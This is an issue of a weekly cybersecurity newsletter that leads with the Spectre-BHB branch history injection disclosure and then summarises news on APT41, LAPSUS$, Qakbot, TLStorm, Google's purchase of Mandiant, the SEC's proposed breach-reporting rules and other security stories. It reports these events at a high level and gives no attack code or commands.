Researchers have disclosed a new workaround that bypasses current hardware mitigations for Spectre-V2 flaws in modern CPUs from Intel and Arm. Called Branch History Injection (Spectre-BHB), the method is a “neat end-to-end exploit“ leaking arbitrary kernel memory on modern CPUs.
Spectre, originally disclosed in January 2018, refers to a class of security vulnerabilities, that stem from a performance-related feature of modern CPUs called speculative execution where the CPU tries to predict in advance which path a program’s execution will take when it reaches a conditional branch and execute instructions on that path in advance.
But if there is a misprediction, the results stored in temporary CPU caches are discarded. Spectre tricks this mechanism to leak information from temporary caches that act as side channels.
“The hardware mitigations do prevent the unprivileged attacker from injecting predictor entries for the kernel,” the researchers explained.
“However, the predictor relies on a global history to select the target entries to speculatively execute. And the attacker can poison this history from userland to force the kernel to mispredict to more ‘interesting’ kernel targets (i.e., gadgets) that leak data,” the Systems and Network Security Group at Vrije Universiteit Amsterdam added.
Spectre-BHB renders vulnerable all Intel and Arm processors that were previously affected by Spectre-V2 along with a number of chipsets from AMD, prompting the three companies to release software updates to remediate the issue.
What’s trending in security?
🔐 Russia announced that it’s moving to establish its own domestic certificate authority after crippling sanctions from Western governments and companies have prevented renewal of Transport Layer Security (TLS) security certificates (sites with expired certificates are blocked by web browsers). The development has raised concerns it could equip the government to potentially intercept internet traffic and stage man-in-the-middle attacks. [The Hacker News]
🛡️ In one of the biggest cybersecurity deals in years, Google said that it has signed a definitive agreement to buy threat intelligence and incident response firm Mandiant for $5.4 billion and integrate it into its cloud computing business. The acquisition is the second largest deal made by Google to date after its doomed takeover of Motorola. [The Hacker News]
🚩 As firmware persistence increasingly becomes a standard part of the big-game APT toolkit, researchers disclosed 16 new flaws in HP UEFI firmware that could be exploited to deploy persistent malware that can bypass security systems. [The Hacker News]
❌ APT41, a prolific and technically advanced hacking collective backed by the Chinese government that has been responsible for a number of attacks in the more than 10 years that it has been active, compromised the computer systems of at least six U.S. state governments by taking advantage of vulnerable internet-facing web applications using Log4Shell and a zero-day flaw in USAHERDS to facilitate their break ins and carry out extensive reconnaissance and credential harvesting activities before dropping malware implants on the infected hosts.
The exact goals of the campaign against state governments “remain unknown,” but what’s obvious is that the nation-state actor moved to exploit the Log4j flaw “within hours” of it becoming public knowledge in December 2021. The persistent and targeted attacks were first detected in May 2021, with the group re-compromising victims, in some cases, even after their initial attack was contained. “APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability,” Mandiant researchers said. [The Hacker News / WIRED / WSJ]
🔌 Three critical security vulnerabilities, collectively called TLStorm, in widely used smart uninterruptible power supply (UPS) devices could allow for remote takeover. The risk for widespread disruption and damage in both the cyber and physical worlds is high if the vulnerabilities are exploited, the researchers said. [The Hacker News]
⚠️ The U.S. Treasury Department’s Financial Crimes Enforcement Network (FinCEN) warned U.S. financial institutions this week to keep an eye out for attempts to evade sanctions and U.S.-imposed restrictions following Russia’s invasion of Ukraine. FinCEN said it’s critical to “identify and quickly report suspicious activity associated with potential sanctions evasion, and conduct appropriate risk-based customer due diligence or, where required, enhanced due diligence.” [FinCEN]
🚨 The U.S. Securities and Exchange Commission (SEC) has proposed rule amendments to require publicly traded companies to report data breaches and other cybersecurity incidents within four business days after they’re determined as being a material incident. The development comes after the U.S. Senate unanimously passed the “Strengthening American Cybersecurity Act” that would require entities that experience a cyber incident to report the attacks within 72 hours to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), in addition to alerting the agency about ransomware payments within 24 hours. [SEC / The Hacker News]
⚡ Amid Russia’s attacks on Ukraine, advanced persistent threat (APT) groups affiliated with or backing the country are ramping up phishing and DDoS attacks against Ukrainian and European targets in cyberspace. Also in the mix are two Chinese nation-state groups, APT31 and Mustang Panda, which have unleashed a flurry of phishing activity aimed at Ukraine and Europe. [The Hacker News]
💎 The LAPSUS$ extortionist gang, which recently struck NVIDIA, has now gone after more companies, including Samsung, Mercado Libre, Ubisoft, and Vodafone. The group’s modus operandi is a little unusual: Rather than attacking targets with ransomware — where data is stolen and a victim’s data is then encrypted in a ransom demand — LAPSUS$ focuses more on data theft and extortion. [The Hacker News / Bleeping Computer / The Verge / CNBC]
⚖️ The U.S. Justice Department (DoJ) extradited two suspected ransomware operators Yaroslav Vasinskyi and Sebastien Vachon-Desjardins, one from Poland and another from Canada, belonging to two different cybercrime gangs REvil and NetWalker for their roles in perpetrating the file-encrypting malware attacks against dozens of entities. These extraditions are part of a string of successes that law enforcement authorities have had in recent months to tackle criminal actors. [The Hacker News / DoJ]
🌡️ Specialized healthcare and IoT devices from 100 different manufacturers have been rendered vulnerable to a new set of seven security flaws called Access:7 in a third-party remote management tool called PTC Axeda, once again bringing to fore the interconnected software ecosystem and underscoring the need to secure the supply chain. Three of the seven vulnerabilities rate as critical, and the other four are medium- to high-severity bugs. [The Hacker News / Forescout]
📧 The email-borne malware Qakbot (aka Qbot) has a tendency to spread itself around by inserting malicious replies into the middle of existing email conversations, using the compromised accounts of other victims. These interjections in the form of a reply-all message include a short sentence, and a link to download a ZIP file containing a malicious office document, resulting in the deployment of the malware that’s capable of executing commands retrieved from an attacker-controlled domain. In a related development, trojans such as Qbot and Lokibot are also being increasingly dropped by means of a Windows living-off-the-land binary (LOLBin) known as Regsvr32 via decoy Microsoft Office documents. [Sophos / Uptycs]
📝 BazarBackdoor, the stealthy malware created by Wizard Spider, the operators of the now-shuttered TrickBot botnet, is now being distributed by means of website contact forms rather than typical phishing emails to evade detection by security software. [Abnormal Security]
🌍 The European Parliament voted to create a new “committee of inquiry” to investigate allegations that European member states acquired and used the powerful Pegasus mobile spyware. The Parliament said the committee “is going to look into existing national laws regulating surveillance, and whether Pegasus spyware was used for political purposes against, for example, journalists, politicians and lawyers.” [European Parliament]
💬 Meta Platforms’ WhatsApp and Cloudflare have banded together for a new browser extension called Code Verify to validate the authenticity of the messaging service’s web app served to web browsers, and ensure that the application has not been tampered with or altered. Code Verify is built on the idea of subresource integrity – where browsers verify the integrity of a fetched file – but applies the principle to all resources on the webpage, and leverages Cloudflare as a trusted third party. [The Hacker News]
🔊 A new working exploit has been devised to commandeer Amazon Echo smart speakers and force them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances. It does require proximate access, though, at least to set the attack up and an attacker can utter a voice command instructing it to pair with an attacker’s Bluetooth-enabled device. [Ars Technica]
💲 After an anonymous Ukrainian security researcher leaked a trove of information about the Conti ransomware group, it turned the tables on the notorious criminal gang. Needless to say, the leaks have offered an unprecedented insight into Conti’s inner workings. But the group doesn’t appear to be fazed. “Conti cyber-threat actors remain active and reported Conti ransomware attacks against US and international organizations have risen to more than 1,000,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said, releasing a list of 100 domain names used by the ransomware group. [The Record / Check Point Research / Cyberint / Rapid7 / BreachQuest / Krebs on Security / CISA]
⛽ Threat actors reportedly gained access to computers belonging to current and former employees at nearly two dozen major natural gas suppliers and exporters in mid-February, including Chevron, Cheniere Energy, and Kinder Morgan, to be sold on the dark web to the highest bidder. [Bloomberg]
📵 Information stealers are now being distributed in the form of links embedded on description to YouTube videos that purportedly claim to be a cheat code for the popular game Valorant. Clicking the link leads to the download of an executable that, once installed, collects “basic information of the infected system as well as various user credentials such as screenshots, user account credentials saved to web browsers and VPN client programs, cryptocurrency wallet files, Discord tokens, and Telegram session files.” [ASEC]
💵 The Ragnar Locker ransomware gang has so far infected at least 52 critical infrastructure organizations in the U.S. across sectors including manufacturing, energy, financial services, government, and information technology, according to a U.S. Federal Bureau of Investigation (FBI) alert. [FBI]
🪷 Vietnamese financial services are being targeted by an updated variant of a backdoor known as PHOREAL (aka RIZZO), a malware known to be used exclusively by a APT32 (aka OceanLotus) [Elastic Security]
🗄️ The past week in data breaches, leaks, and ransomware: Adafruit, Bridgestone, PressReader, Rompetrol, Rostec, and Triolan.
Tips, Comments, Ideas?
Send them my way by writing replying to this email.
Thanks again for reading. See you in the next edition!